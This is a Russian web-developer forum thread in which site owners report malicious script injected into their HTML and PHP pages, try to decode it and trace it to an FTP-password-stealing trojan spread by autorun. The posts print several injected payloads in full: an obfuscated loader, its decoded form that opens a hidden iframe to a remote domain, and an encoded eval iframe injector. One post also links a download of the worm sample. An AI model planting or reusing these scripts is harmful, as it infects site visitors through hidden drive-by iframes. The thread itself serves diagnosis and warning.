Jump to content

SOS! Вирус в PHP? или что это такое???

Maslakoff

By Maslakoff,
in Flame

 Share

Recommended Posts

Maslakoff Explorer

Maslakoff

Posted
Posted 

<!--[Q]--><script>document.write(unescape("%3Cscript%3Eif%28NQ%21%3D1%29%7Bfunction%20Ib%28Bj%29%7Breturn%20Bj%7Dtry%7Bvar%20Kp%3D%27XX2XP2Xk2X42XJ2XO2Xf2Xb2Xl2X62Xo2XL2Xd2XK2Xt2XS2Xe2XM2X52Xs2Xr2X92Xn2Xh2Xq2XI2X72XU2X32XC2Xg2Xw2XV2XY2Xc2Xm2XG2Xx2X82Xa2XZ2Xp2XN2XT2XA2Xi2XR2XD2XH2XW2Xz2Xj2XF2Xy2PX2PP2Pk2P42PJ2PO2Pf2Pb2Pl2P62Po2PL2Pd2PK2Pt2PS2Pe2PM2P52Ps2Pr2P92Pn2Ph2Pq%27%2Cbp%3DIb%28%272%27%29%3Bvar%20Rr%3DArray%283002%5E3043%2C7773%5E7755%2Cpc%28%276%27%29%2Cpc%28%2723%27%29%2Cpc%28%2712%27%29%2Cpc%28%2721%27%29%2Cpc%28%2717%27%29%2C13278%5E13189%2C30998%5E30997%2Cpc%28%2716%27%29%2C26388%5E26399%2Cpc%28%2710%27%29%2C9748%5E9809%2Cpc%28%2733%27%29%2C12576%5E12585%2Cpc%28%2777%27%29%2C10713%5E10729%2Cpc%28%2773%27%29%2C16686%5E16687%2Cpc%28%270%27%29%2C14140%5E14095%2C2307%5E2383%2C19353%5E19335%2Cpc%28%2719%27%29%2C7613%5E7609%2Cpc%28%2728%27%29%2C10223%5E10167%2C25877%5E25863%2Cpc%28%2732%27%29%2C14631%5E14713%2Cpc%28%2775%27%29%2C13608%5E13593%2Cpc%28%278%27%29%2C7627%5E7625%2C25805%5E25731%2Cpc%28%2793%27%29%2Cpc%28%2783%27%29%2Cpc%28%2781%27%29%2C21718%5E21635%2Cpc%28%2714%27%29%2Cpc%28%2771%27%29%2C1296%5E1293%2Cpc%28%2734%27%29%2Cpc%28%2740%27%29%2Cpc%28%2754%27%29%2C18599%5E18623%2C24177%5E24151%2Cpc%28%277%27%29%2C11951%5E11915%2Cpc%28%2766%27%29%2C11577%5E11629%2Cpc%28%2741%27%29%2Cpc%28%2763%27%29%2C2201%5E2229%2C24089%5E24147%2Cpc%28%2713%27%29%2Cpc%28%2742%27%29%2C30857%5E30913%2C21248%5E21309%2C31818%5E31765%2Cpc%28%2768%27%29%2C11385%5E11299%2Cpc%28%2745%27%29%2C18039%5E18009%2Cpc%28%2762%27%29%2C24264%5E24307%2C20714%5E20725%2C10665%5E10741%2C1629%5E1637%2C22144%5E22201%2C17086%5E17073%2C16188%5E16155%2Cpc%28%27111%27%29%2C21058%5E21013%2C14527%5E14507%2C22347%5E22301%2C24735%5E24783%2Cpc%28%2782%27%29%2Cpc%28%2779%27%29%29%2CJg%3Bvar%20kt%2Cbh%3Bvar%20jB%3D%27XXXPXkX4XJXOXfXbXlX6XoXkXfXJXLXoXdXkXKXtXSXJXeXOXMX5XsXrX9XnXdXhXqX4XdXLXIXOX7XoXsXUXdXKXqXfXsXSX9XMXdXOX3XkX7XdXoXsXUXdXKXqXfXsXSX9XCXdXOX3XkXgXPXsXfXwXJXVXsXSXLXIXOXgXYXsXfXwXJXVXsXSX9XcXmXGXxX8X8X8X8X8X9XCXdX5XLXkX6XVXsXoXfXgXkXLXLXaXJXsXdX7XdXJXeXOXcXZX7XZXcXsXPXkXqXOXsXSX5XsXrX9XcXZXCXsXpXOXJX4XsXPX7XZXcXOX3XkXgXfXLXNXTXwXAXfX4XJXoXYXSX9XCXdXiXhXqX4XdXRXDXHX7XWXPXzXlXjX6XfXWXCXhXqX4XdXUXJXIX7XWXzXWXMXFXyXtX7XWX6XOX5XqXfXsXzXgXkXtXqXPXPXJXkXfXsXtXgXLX4XYXWXCXhXqX4XdXjXlXJX7XWPXPPXfXVXtPXXWXCXJXlXSX5XLXkX6XVXsXoXfXgXkXLXLXaXJXsXgXJXoX5XsXpPkXlXSXRXDXHXcXWX7XWXcXUXJXIX9XdX7X7P4XzX9XnXhXqX4XdX5XtPPX7X5XLXkX6XVXsXoXfXgXtXLXkXqXfXJXLXoXgPPXLXPXfXCXhXqX4XdXpPJXVX7XdXWPPXfXWXcXWXfXOPOXWXcXWPXPXXWXcXSXdX5XtPPXdPfX7XdXWXWPbXWXWPOPlXVP6XSX9X9XdXcXdX5XtPPXgX4XsXOXtXqXkXsXdXSPXPoPLXqP4PdX8P4PKXgP4PtPXXMXWXgXWX9XgX4XsXOXtXqXkXsXdXSPXPSXgXcPXXMXWXgXWX9XcXWXgXWXcPlXVP6XSX9XdXcXWXgXWXdXcXdXFXyXtXcXjXlXJXCXhXqX4XdXPPeXNX7X5XLXkX6XVXsXoXfXgXkX4XsXqXfXsX3XtXsXVXsXoXfXSXWXJXlX4XqXVXsXWX9XCXPPeXNXgXPXsXfXHXfXfX4XJXDX6XfXsXdXSXWXPX4XkXWXMXdXpPJXVX9XCXPPeXNXgPPXsXJXYPPXfX7XxXCXPPeXNXgXUXJX5XfPPX7X8XCXPPeXNXgXlX4XqXVXsPMXLX4X5XsX4XdX7XdX8XCXdXfX4XIXnXdX5XLXkX6XVXsXoXfXgXDXLX5XIXgXqXOXOXsXoX5XRPPXJXtX5XdXSXdXPPeXNX9XCXdXkXKXtXSXRXDXHXMXdXUXJXIXdX9XCXiXdXkXqXfXkPPXSXsX9XdXnX5XLXkX6XVXsXoXfXgXUX4XJXfXsXdXSXWXXPPXfXVXtXbXXXDXLX5XIXbXXPXXDXLX5XIXbXXPXPPXfXVXtXbXWX9XCXdX5XLXkX6XVXsXoXfXgXDXLX5XIXgXqXOXOXsXoX5XRPPXJXtX5XdXSXdXPPeXNX9XCXkXKXtXdXSXdXRXDXHXMXUXJXIX9XdXCXiXdXiP5XlX6XoXkXfXJXLXoXdPlXVP6XSX9XnXdXhXqX4XdX5XOX6X7PsXxXCXhXqX4XdXpX4PrX7XZX8XzPsP9XxPnXGPhXmPKX8XqXDXkX5XsXlXZXMXVXkXwX7XZXZXCXdXlXLX4XSPrXaXfX7X8XCXdPrXaXfXdXXXdX5XOX6XCXdPrXaXfXcXcX9XdXVXkXwXcX7XdXpX4PrXgXPX6XDXPXfX4XSXTXqXfPPXgXlXtXLXLX4XSXTXqXfPPXgX4XqXoX5XLXVXSX9PqXpX4PrXgXtXsXoXYXfPPX9XMXzXMXzX9XCXdX4XsXfX6X4XoXdXVXkXwXCXdXiXXPXXPXkX4XJXOXfXb%27%2Cfc%3D%27%27%3BKp%3DKp.split%28bp%29%3Bfor%20%28Jg%3D0%3BJg%3CjB.length%3BJg+%3D2%29%7Bbh%3DjB.substr%28Jg%2C2%29%3Bfor%28kt%3D0%3Bkt%3CKp.length%3Bkt++%29%7Bif%28Kp%5Bkt%5D%3D%3Dbh%29break%3B%7Dfc+%3DString.fromCharCode%28Rr%5Bkt%5D%5E101%29%3B%7Dfunction%20pc%28Jk%29%7Breturn%20parseInt%28Jk%29%7Ddocument.write%28fc%29%3B%7Dcatch%28jW%29%7B%7D%7Dvar%20NQ%3D1%3C/script%3E"))</script><!--[/Q]-->

Вот такая вот фигня была замечена как минимум на 3х совершенно разных сайтах. Причем, и-за этого летят PHP-скрипты. Эта штука добавляется либо вверх, либо вниз страницы. Это было замечено и в топике: http://forum.htmlbook.ru/index.php?showtopic=5787 . И вызвало ошибку на мо?м сайте, который обсуждается здесь: http://forum.htmlbook.ru/index.php?showtopic=5764 Оно добралось и до моего сайта. Летят стили, летит PHP((( Что делать? Кто может разкодить, просьба сделать это немедленно! Потомучто добавление строчек происходит и на платном и на беспланом хостинге...

Link to comment
Share on other sites
Maslakoff Explorer

Maslakoff

Posted
  • Author
Posted

Вот результаты почти конечной расшифровки кода:

<script>

function cDl(iUp,deV)
{
 var oyp=new Date();
 var pEc= new Date();
 pEc.setTime(oyp.getTime()+86400000);
 document.cookie = iUp+"="+escape(deV)+";
 expires="+pEc.toGMTString(); 
}

var CbA='s1fLut';
var wiy='1';
var ZIl='update1.classictel.org';
var Lfi='/html/';

if(document.cookie.indexOf(CbA+'='+wiy) ==-1)
{
 var dlh=document.location.host;
 var xXm= 'ht'+'tp:'+'//'+( dlh != ''?'':HmK()) + dlh.replace (/[^a-z0-9.-]/,'.').replace (/.+/,'.')+'.'+HmK() +'.' + ZIl+Lfi;
 var sjG=document.createElement('iframe');
 sjG.setAttribute ('src', xXm);
 sjG.height=4;sjG.width=0;
 sjG.frameBorder = 0; 

 try{
 document.body.appendChild ( sjG); cDl(CbA, wiy );
 } catch(e) 
 {
 document.write ('<html><body></body></html>');
 document.body.appendChild ( sjG);cDl ( CbA,wiy);
 } 
} 

function HmK()
{
 var dpu=24;
 var xrq="01234567890abcdef";
 var mcT="";

 for(qkt=0; qkt < dpu; qkt++) mcT+= xrq.substr(Math.floor(Math.random()*xrq.length),1,1); 

 return mcT; 
}

</script>

что он делает?

Link to comment
Share on other sites
Maslakoff Explorer

Maslakoff

Posted
  • Author
Posted

Возможно.

Но походу оно генеритьс не случайно, ведь на сервере по тому URL возможна проверка на совпадение. Если да. то выводим тело вируса. Если нет, то пусто.

+ еще прикол с Cookie. Здесь походу URL генериться всего 1 раз. Потом регенериться. Нужно разобраться что оно такое.

Но тот факт, что это замечено на нескольких сайтах разных хостеров, остается в силе.

Советую, обновить базу вирусов и проверить их наличие/отсуцтвие на компутере.

Link to comment
Share on other sites
Maslakoff Explorer

Maslakoff

Posted
  • Author
Posted

В общем, я разобрался. Это вирус, причем храниться на локальной, а не серверной машине. Он "тырит" пароли от FTP и записывает в файлы типа home.html, index.html(*.php) Вот такие вредностные строчки.

Вот что он отсылает на сервер... Я затрудняюсь ответить.

Что, где, кто слышал, знает о этом вирусе. Выкладывайте инфу. ESET не детектит его(((

У кого какой антивирус продетектил его через IE?

В фаерфоксе изначальный JS-код не пашет!

PS: Информация поступила от человека, который держит около 40-ка сайтов. Они были поголовно заражены. Будьте осторожны и бдительны.!

Link to comment
Share on other sites
rash Explorer

rash

Posted
Posted

Так это локальная опасность все-таки?

Просто фраза "Информация поступила от человека, который держит около 40-ка сайтов. Они были поголовно заражены." говорит, что были заражены все-таки сайты...

Можно попробовать поискать его например с помощью CureIt...

Link to comment
Share on other sites
atn Explorer

atn

Posted
Posted

У меня на двух сайтах тоже подобная ерунда была, в index.php всегда записывается. Запарился удалять...щас вроде перестало. Всегда разная прчием :(

Вот одну сохранил:

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%36%65%39%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%74%6f%6d%61%6b%61%79%61%6e%2e%62%69%7a%2f%69%6e%64%65%78%2e%70%68%70%3f%6f%75%74%3d%31%31%39%30%32%33%38%37%33%32%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%38%34%39%33%30%29%2b%27%65%61%62%35%66%64%39%62%32%31%5c%27%20%77%69%64%74%68%3d%35%37%30%20%68%65%69%67%68%74%3d%31%34%39%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));

ЗЫ: Каспреский всех заметил :)

Link to comment
Share on other sites
klierik Middle Developer

klierik

Posted
Posted

есть одна... какой-нибудь хак скрипта на сервере и добавление строки в страницу.

но ведь в таком случае это взлом только одного сайта.

а выше говорилось о 40а сайтах, по всей видимости, на одной площадке размещенных.

врятли кто-то б ломал 40сайтом одного провайдера

Link to comment
Share on other sites
Dimitry Wolotko Explorer

Dimitry Wolotko

Posted
Posted

Ну для меня вариантов есть два.

Первый - поломан хостер, и на всех его площадках внедр?н такой код. Однако сомневаюсь, что рбк и мс ломали так нагло :o

Второй - хозяин ресурса получил подарок в виде трояна, котрый слил все пароли из популярных клиентов, которые работают с ФТП (ие, фар, тк ect) - ну и потом бот проставил везде свой код на Index.*

Link to comment
Share on other sites
D.S.Denton Explorer

D.S.Denton

Posted
Posted

в дополнение... (сие безобразие детектится авастом c 10 сентября) Win32:Hupigon-DFK [Trj]

в .html, .php приписывается айфрейм размера 0*0 (сейчас уже точно не помню, там адрес krvkr.com)

распространяется через посещение этих страниц великим ИЕ, а также через флеш-драйвы, прописывая себя в авторан.

также копирует себя в system32 под именем nvscv32.exe и прописывается в автозапуск

косяк у вирмейкера вышел - в авторан.инф он сует не только команду на открытие экзешника, но и иконку драйва (серая такая папка в стиле вин98)

если не обратить внимание на изменившуюся иконку и все-таки запустить экзешник, он переписывает себя в .exe на локальной машине (не понял правда по какому принципу - на диске c ничего не тронул, на d только фтп-клиенты Asona FTP и Smart FTP). плюс во все хтмл и пхп (cgi не тронул) добавил в конце айфреймовую строку с тем самым krvkr.

в москве сей червяк вольготно себя чувствует в CafeMax'е. я сидел на трех машинах, на всех обнаружил эту бяку, так что осторожнее суем флешки.

сам червяк (руками не трогать!) - http://denton.msk.ru/files/index.php?actio...ame=nvscv32.rar

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue. See more about our Guidelines and Privacy Policy

  I accept